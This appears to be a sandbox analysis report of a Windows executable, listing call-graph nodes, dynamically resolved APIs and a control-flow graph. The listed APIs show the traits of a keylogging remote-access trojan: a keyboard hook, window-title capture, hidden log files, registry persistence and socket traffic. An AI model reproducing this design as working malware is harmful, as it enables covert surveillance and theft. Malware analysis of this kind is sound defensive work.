40a2c4 47638->47664 47639->47638 47661 40a2a2 47639->47661 47641 40a25f 47640->47641 47641->47600 47642->47607 47789 40a2ae 164 API calls 47642->47789 47644 402888 22 API calls 47643->47644 47645 40427b 47644->47645 47646 404290 47645->47646 47647 4042a5 47645->47647 47653 4042df 22 API calls 47646->47653 47648 4027e6 28 API calls 47647->47648 47652 4042a3 47648->47652 47650 404299 47654 402c48 22 API calls 47650->47654 47652->47619 47653->47650 47654->47652 47656 40b930 47655->47656 47657 40a1d2 47655->47657 47660 40b9a7 28 API calls 47656->47660 47657->47623 47657->47624 47659->47635 47660->47657 47670 40a2f3 47661->47670 47700 40ad11 47664->47700 47742 40a761 47667->47742 47671 40a30c GetModuleHandleA SetWindowsHookExA 47670->47671 47672 40a36e GetMessageA 47670->47672 47671->47672 47674 40a328 GetLastError 47671->47674 47673 40a380 TranslateMessage DispatchMessageA 47672->47673 47684 40a2ab 47672->47684 47673->47672 47673->47684 47685 41bc1f 47674->47685 47691 441ed1 47685->47691 47688 402093 28 API calls 47689 40a339 47688->47689 47690 4052fd 28 API calls 47689->47690 47692 441edd 47691->47692 47695 441ccd 47692->47695 47694 41bc43 47694->47688 47696 441ce4 47695->47696 47698 441d1b __cftoe 47696->47698 47699 44062d 20 API calls __dosmaperr 47696->47699 47698->47694 47699->47698 47707 40ad1f 47700->47707 47701 40a2cd 47702 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 47703 40b93f 28 API calls 47702->47703 47703->47707 47707->47701 47707->47702 47709 41bb77 GetLastInputInfo GetTickCount 47707->47709 47710 40adbf GetWindowTextW 47707->47710 47712 401f09 11 API calls 47707->47712 47713 40af17 47707->47713 47714 40b927 28 API calls 47707->47714 47716 40ae84 Sleep 47707->47716 47717 441ed1 20 API calls 47707->47717 47719 402093 28 API calls 47707->47719 47723 40ae0c 47707->47723 47724 406383 28 API calls 47707->47724 47726 403014 28 API calls 47707->47726 47727 41bcef 28 API calls 47707->47727 47728 40a671 12 API calls 47707->47728 47729 401fd8 11 API calls 47707->47729 47730 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 47707->47730 47731 401f86 47707->47731 47735 434801 23 API calls __onexit 47707->47735 47736 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 47707->47736 47737 40907f 28 API calls 47707->47737 47739 40b9b7 28 API calls 47707->47739 47740 40b783 40 API calls 2 library calls 47707->47740 47741 4052fd 28 API calls 47707->47741 47709->47707 47710->47707 47712->47707 47715 401f09 11 API calls 47713->47715 47714->47707 47715->47701 47716->47707 47717->47707 47719->47707 47721 409097 28 API calls 47721->47723 47723->47707 47723->47721 47738 40b19f 31 API calls _Yarn 47723->47738 47724->47707 47726->47707 47727->47707 47728->47707 47729->47707 47732 401f8e 47731->47732 47733 402252 11 API calls 47732->47733 47734 401f99 47733->47734 47734->47707 47735->47707 47736->47707 47737->47707 47738->47723 47739->47707 47740->47707 47743 40a776 Sleep 47742->47743 47763 40a6b0 47743->47763 47745 40a2c1 47746 40a7b6 CreateDirectoryW 47748 40a788 47746->47748 47747 40a7c7 GetFileAttributesW 47747->47748 47748->47743 47748->47745 47748->47746 47748->47747 47749 40a7de SetFileAttributesW 47748->47749 47750 40a829 47748->47750 47753 401e65 22 API calls 47748->47753 47776 41c482 47748->47776 47749->47748 47752 40a858 PathFileExistsW 47750->47752 47754 4020df 11 API calls 47750->47754 47755 4020b7 28 API calls 47750->47755 47757 40a961 SetFileAttributesW 47750->47757 47758 406e13 28 API calls 47750->47758 47759 401fe2 28 API calls 47750->47759 47760 401fd8 11 API calls 47750->47760 47762 401fd8 11 API calls 47750->47762 47786 41c516 32 API calls 47750->47786 47787 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 47750->47787 47752->47750 47753->47748 47754->47750 47755->47750 47757->47748 47758->47750 47759->47750 47760->47750 47762->47748 47764 40a75d 47763->47764 47766 40a6c6 47763->47766 47764->47748 47765 40a6e5 CreateFileW 47765->47766 47767 40a6f3 GetFileSize 47765->47767 47766->47765 47768 40a728 CloseHandle 47766->47768 47769 40a73a 47766->47769 47770 40a716 47766->47770 47771 40a71d Sleep 47766->47771 47767->47766 47767->47768 47768->47766 47769->47764 47773 409097 28 API calls 47769->47773 47788 40b117 84 API calls 47770->47788 47771->47768 47774 40a756 47773->47774 47775 40a1b4 125 API calls 47774->47775 47775->47764 47777 41c495 CreateFileW 47776->47777 47779 41c4d2 47777->47779 47780 41c4ce 47777->47780 47781 41c4f2 WriteFile 47779->47781 47782 41c4d9 SetFilePointer 47779->47782 47780->47748 47784 41c505 47781->47784 47785 41c507 CloseHandle 47781->47785 47782->47781 47783 41c4e9 CloseHandle 47782->47783 47783->47780 47784->47785 47785->47780 47786->47750 47787->47750 47788->47771 47791 40322e 47790->47791 47800 403618 47791->47800 47793 40323b 47793->47611 47795 40326e 47794->47795 47796 402252 11 API calls 47795->47796 47797 403288 47796->47797 47798 402336 11 API calls 47797->47798 47799 403031 47798->47799 47799->47150 47801 403626 47800->47801 47802 403644 47801->47802 47803 40362c 47801->47803 47805 40365c 47802->47805 47806 40369e 47802->47806 47811 4036a6 28 API calls 47803->47811 47808 4027e6 28 API calls 47805->47808 47810 403642 47805->47810 47812 4028a4 22 API calls 47806->47812 47808->47810 47810->47793 47811->47810 47814 404186 47813->47814 47815 402252 11 API calls 47814->47815 47816 404191 47815->47816 47824 4041bc 47816->47824 47819 4042fc 47835 404353 47819->47835 47821 40430a 47822 403262 11 API calls 47821->47822 47823 404319 47822->47823 47823->47159 47825 4041c8 47824->47825 47828 4041d9 47825->47828 47827 40419c 47827->47819 47829 4041e9 47828->47829 47830 404206 47829->47830 47832 4041ef 47829->47832 47831 4027e6 28 API calls 47830->47831 47834 404204 47831->47834 47833 404267 28 API calls 47832->47833 47833->47834 47834->47827 47836 40435f 47835->47836 47839 404371 47836->47839 47838 40436d 47838->47821 47840 40437f 47839->47840 47841 404385 47840->47841 47842 40439e 47840->47842 47903 4034e6 28 API calls 47841->47903 47843 402888 22 API calls 47842->47843 47844 4043a6 47843->47844 47846 404419 47844->47846 47847 4043bf 47844->47847 47904 4028a4 22 API calls 47846->47904 47849 4027e6 28 API calls 47847->47849 47852 40439c 47847->47852 47849->47852 47852->47838 47903->47852 47911 43ab1a 47905->47911 47909 4138ca RegSetValueExA RegCloseKey 47908->47909 47910 4138f4 47908->47910 47909->47910 47910->47175 47914 43aa9b 47911->47914 47913 40170d 47913->47177 47915 43aaaa 47914->47915 47916 43aabe 47914->47916 47920 44062d 20 API calls __dosmaperr 47915->47920 47918 43aaaf __alldvrm __cftoe 47916->47918 47921 4489d7 11 API calls 2 library calls 47916->47921 47918->47913 47920->47918 47921->47918 47925 41b98a ctype ___scrt_fastfail 47922->47925 47923 402093 28 API calls 47924 414f84 47923->47924 47924->47184 47925->47923 47926->47201 47928 414f33 47927->47928 47929 414f3d getaddrinfo WSASetLastError 47927->47929 48095 414dc1 29 API calls ___std_exception_copy 47928->48095 47929->47229 47931 414f38 47931->47929 47933 404846 socket 47932->47933 47934 404839 47932->47934 47936 404860 CreateEventW 47933->47936 47937 404842 47933->47937 48096 40489e WSAStartup 47934->48096 47936->47229 47937->47229 47938 40483e 47938->47933 47938->47937 47940 404f65 47939->47940 47941 404fea 47939->47941 47942 404f6e 47940->47942 47943 404fc0 CreateEventA CreateThread 47940->47943 47944 404f7d GetLocalTime 47940->47944 47941->47229 47942->47943 47943->47941 48098 405150 47943->48098 47945 41bc1f 28 API calls 47944->47945 47946 404f91 47945->47946 48097 4052fd 28 API calls 47946->48097 47955 404a1b 47954->47955 47956 4048ee 47954->47956 47957 40497e 47955->47957 47958 404a21 WSAGetLastError 47955->47958 47956->47957 47959 404923 47956->47959 47962 40531e 28 API calls 47956->47962 47957->47229 47958->47957 47960 404a31 47958->47960 48102 420cf1 27 API calls 47959->48102 47963 404932 47960->47963 47964 404a36 47960->47964 47967 40490f 47962->47967 47970 402093 28 API calls 47963->47970 48113 41cb72 30 API calls 47964->48113 47966 40492b 47966->47963 47969 404941 47966->47969 47971 402093 28 API calls 47967->47971 47968 404a40 48114 4052fd 28 API calls 47968->48114 47979 404950 47969->47979 47980 404987 47969->47980 47974 404a80 47970->47974 47972 40491e 47971->47972 47975 41b580 80 API calls 47972->47975 47977 402093 28 API calls 47974->47977 47975->47959 47981 404a8f 47977->47981 47985 402093 28 API calls 47979->47985 48110 421ad1 54 API calls 47980->48110 47982 41b580 80 API calls 47981->47982 47982->47957 47988 40495f 47985->47988 47987 40498f 47990 4049c4 47987->47990 47991 404994 47987->47991 47992 402093 28 API calls 47988->47992 48112 420e97 28 API calls 47990->48112 47995 402093 28 API calls 47991->47995 47996 40496e 47992->47996 47998 4049a3 47995->47998 47999 41b580 80 API calls 47996->47999 47997 4049cc 48001 4049f9 CreateEventW CreateEventW 47997->48001 48003 402093 28 API calls 47997->48003 48002 402093 28 API calls 47998->48002 48000 404973 47999->48000 48103 420d31 48000->48103 48001->47957 48004 4049b2 48002->48004 48006 4049e2 48003->48006 48007 41b580 80 API calls 48004->48007 48008 402093 28 API calls 48006->48008 48009 4049b7 48007->48009 48010 4049f1 48008->48010 48111 421143 52 API calls 48009->48111 48012 41b580 80 API calls 48010->48012 48013 4049f6 48012->48013 48013->48001 48117 41b847 GlobalMemoryStatusEx 48014->48117 48016 41b886 48016->47229 48118 4145bb 48017->48118 48021 40dde0 48020->48021 48022 41353a 3 API calls 48021->48022 48024 40dde7 48022->48024 48023 40ddff 48023->47229 48024->48023 48025 413584 3 API calls 48024->48025 48025->48023 48027 4020b7 28 API calls 48026->48027 48028 41bce8 48027->48028 48028->47229 48029->47229 48031 436f10 ___scrt_fastfail 48030->48031 48032 41bb46 GetForegroundWindow GetWindowTextW 48031->48032 48033 40417e 28 API calls 48032->48033 48034 41bb70 48033->48034 48034->47229 48036 402093 28 API calls 48035->48036 48037 40f931 48036->48037 48037->47229 48039 4020df 11 API calls 48038->48039 48040 402f3d 48039->48040 48041 4032a0 28 API calls 48040->48041 48042 402f59 48041->48042 48042->47229 48044 404ab4 48043->48044 48156 40520c 48044->48156 48046 404ac9 ctype 48047 404b40 WaitForSingleObject 48046->48047 48048 404b20 48046->48048 48050 404b56 48047->48050 48049 404b32 send 48048->48049 48051 404b7b 48049->48051 48162 4210cb 54 API calls 48050->48162 48054 401fd8 11 API calls 48051->48054 48053 404b69 SetEvent 48053->48051 48055 404b83 48054->48055 48056 401fd8 11 API calls 48055->48056 48057 404b8b 48056->48057 48057->47229 48059 4020df 11 API calls 48058->48059 48060 404c27 48059->48060 48061 4020df 11 API calls 48060->48061 48071 404c30 48061->48071 48062 43bda0 _Yarn 21 API calls 48062->48071 48064 4020b7 28 API calls 48064->48071 48065 404ca1 48067 404e26 99 API calls 48065->48067 48066 401fe2 28 API calls 48066->48071 48068 404ca8 48067->48068 48070 401fd8 11 API calls 48068->48070 48069 401fd8 11 API calls 48069->48071 48072 404cb1 48070->48072 48071->48062 48071->48064 48071->48065 48071->48066 48071->48069 48074 404c84 48071->48074 48181 404b96 48071->48181 48073 401fd8 11 API calls 48072->48073 48075 404cba 48073->48075 48187 404cc3 32 API calls 48074->48187 48075->47229 48077->47229 48078->47229 48080->47229 48082 404e40 SetEvent CloseHandle 48081->48082 48083 404e57 closesocket 48081->48083 48084 404ed8 48082->48084 48085 404e64 48083->48085 48084->47229 48086 404e73 48085->48086 48087 404e7a 48085->48087 48189 4050e4 84 API calls 48086->48189 48089 404e8c WaitForSingleObject 48087->48089 48090 404ece SetEvent CloseHandle 48087->48090 48091 420d31 3 API calls 48089->48091 48090->48084 48092 404e9b SetEvent WaitForSingleObject 48091->48092 48093 420d31 3 API calls 48092->48093 48094 404eb3 SetEvent CloseHandle CloseHandle 48093->48094 48094->48090 48095->47931 48096->47938 48101 40515c 102 API calls 48098->48101 48100 405159 48101->48100 48102->47966 48104 41e7a2 48103->48104 48105 420d39 48103->48105 48106 41e7b0 48104->48106 48115 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48104->48115 48105->47957 48116 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48106->48116 48109 41e7b7 48110->47987 48111->48000 48112->47997 48113->47968 48115->48106 48116->48109 48117->48016 48121 41458e 48118->48121 48122 4145a3 ___scrt_initialize_default_local_stdio_options 48121->48122 48125 43f7ed 48122->48125 48128 43c540 48125->48128 48129 43c580 48128->48129 48130 43c568 48128->48130 48129->48130 48132 43c588 48129->48132 48150 44062d 20 API calls __dosmaperr 48130->48150 48151 43a837 36 API calls 2 library calls 48132->48151 48133 43c56d __cftoe 48143 43502b 48133->48143 48135 43c598 48152 43ccc6 20 API calls 2 library calls 48135->48152 48138 43c610 48153 43d334 51 API calls 3 library calls 48138->48153 48139 4145b1 48139->47229 48142 43c61b 48154 43cd30 20 API calls _free 48142->48154 48144 435036 IsProcessorFeaturePresent 48143->48144 48145 435034 48143->48145 48147 435078 48144->48147 48145->48139 48155 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48147->48155 48149 43515b 48149->48139 48150->48133 48151->48135 48152->48138 48153->48142 48154->48133 48155->48149 48157 405214 48156->48157 48158 4023ce 11 API calls 48157->48158 48159 40521f 48158->48159 48163 405234 48159->48163 48161 40522e 48161->48046 48162->48053 48164 405240 48163->48164 48165 40526e 48163->48165 48179 4028e8 28 API calls 48164->48179 48180 4028a4 22 API calls 48165->48180 48168 40524a 48168->48161 48179->48168 48182 404ba0 WaitForSingleObject 48181->48182 48183 404bcd recv 48181->48183 48188 421107 54 API calls 48182->48188 48185 404be0 48183->48185 48185->48071 48186 404bbc SetEvent 48186->48185 48187->48071 48188->48186 48189->48087 48191->47292 48192->47320 48193->47319 48194->47308 48195->47312 48196->47318 48197->47349 48202 40f7fd 48200->48202 48201 413584 3 API calls 48201->48202 48202->48201 48203 40f8a1 48202->48203 48205 40f891 Sleep 48202->48205 48222 40f82f 48202->48222 48206 409097 28 API calls 48203->48206 48204 409097 28 API calls 48204->48222 48205->48202 48209 40f8ac 48206->48209 48208 41bcef 28 API calls 48208->48222 48210 41bcef 28 API calls 48209->48210 48211 40f8b8 48210->48211 48235 41384f 14 API calls 48211->48235 48214 401f09 11 API calls 48214->48222 48215 40f8cb 48216 401f09 11 API calls 48215->48216 48218 40f8d7 48216->48218 48217 402093 28 API calls 48217->48222 48219 402093 28 API calls 48218->48219 48220 40f8e8 48219->48220 48223 4137aa 14 API calls 48220->48223 48221 4137aa 14 API calls 48221->48222 48222->48204 48222->48205 48222->48208 48222->48214 48222->48217 48222->48221 48233 40d0d1 112 API calls ___scrt_fastfail 48222->48233 48234 41384f 14 API calls 48222->48234 48224 40f8fb 48223->48224 48236 41288b TerminateProcess WaitForSingleObject 48224->48236 48226 40f903 ExitProcess 48237 412829 62 API calls 48227->48237 48234->48222 48235->48215 48236->48226 48238 42f97e 48239 42f989 48238->48239 48240 42f99d 48239->48240 48242 432f7f 48239->48242 48243 432f8a 48242->48243 48244 432f8e 48242->48244 48243->48240 48246 440f5d 48244->48246 48247 446206 48246->48247 48248 446213 48247->48248 48249 44621e 48247->48249 48250 4461b8 ___crtLCMapStringA 21 API calls 48248->48250 48251 446226 48249->48251 48257 44622f ___crtLCMapStringA 48249->48257 48255 44621b 48250->48255 48259 446802 20 API calls __dosmaperr 48251->48259 48253 446234 48260 44062d 20 API calls __dosmaperr 48253->48260 48254 446259 RtlReAllocateHeap 48254->48255 48254->48257 48255->48243 48257->48253 48257->48254 48261 443001 7 API calls 2 library calls 48257->48261 48259->48255 48260->48255 48261->48257 48262 40165e 48263 401666 48262->48263 48265 401669 48262->48265 48264 4016a8 48266 43455e new 22 API calls 48264->48266 48265->48264 48267 401696 48265->48267 48268 40169c 48266->48268 48269 43455e new 22 API calls 48267->48269 48269->48268 48270 426cdc 48275 426d59 send 48270->48275 48276 41e04e 48277 41e063 ctype ___scrt_fastfail 48276->48277 48279 432f55 21 API calls 48277->48279 48289 41e266 48277->48289 48283 41e213 ___scrt_fastfail 48279->48283 48280 41e277 48281 41e21a 48280->48281 48291 432f55 48280->48291 48283->48281 48284 432f55 21 API calls 48283->48284 48287 41e240 ___scrt_fastfail 48284->48287 48285 41e2b0 ___scrt_fastfail 48285->48281 48296 4335db 48285->48296 48287->48281 48288 432f55 21 API calls 48287->48288 48288->48289 48289->48281 48290 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 48289->48290 48290->48280 48292 432f63 48291->48292 48293 432f5f 48291->48293 48294 43bda0 _Yarn 21 API calls 48292->48294 48293->48285 48295 432f68 48294->48295 48295->48285 48299 4334fa 48296->48299 48298 4335e3 48298->48281 48300 433513 48299->48300 48303 433509 48299->48303 48301 432f55 21 API calls 48300->48301 48300->48303 48302 433534 48301->48302 48302->48303 48305 4338c8 CryptAcquireContextA 48302->48305 48303->48298 48306 4338e4 48305->48306 48307 4338e9 CryptGenRandom 48305->48307 48306->48303 48307->48306 48308 4338fe CryptReleaseContext 48307->48308 48308->48306 48309 426c6d 48315 426d42 recv 48309->48315

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 94 40ef2c 89->94 95 40ec57 90->95 96 40ec59-40ec65 call 41b354 90->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 143 40eca4-40ecaa 140->143 143->107 147 40ecac call 40729b 143->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                  APIs
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
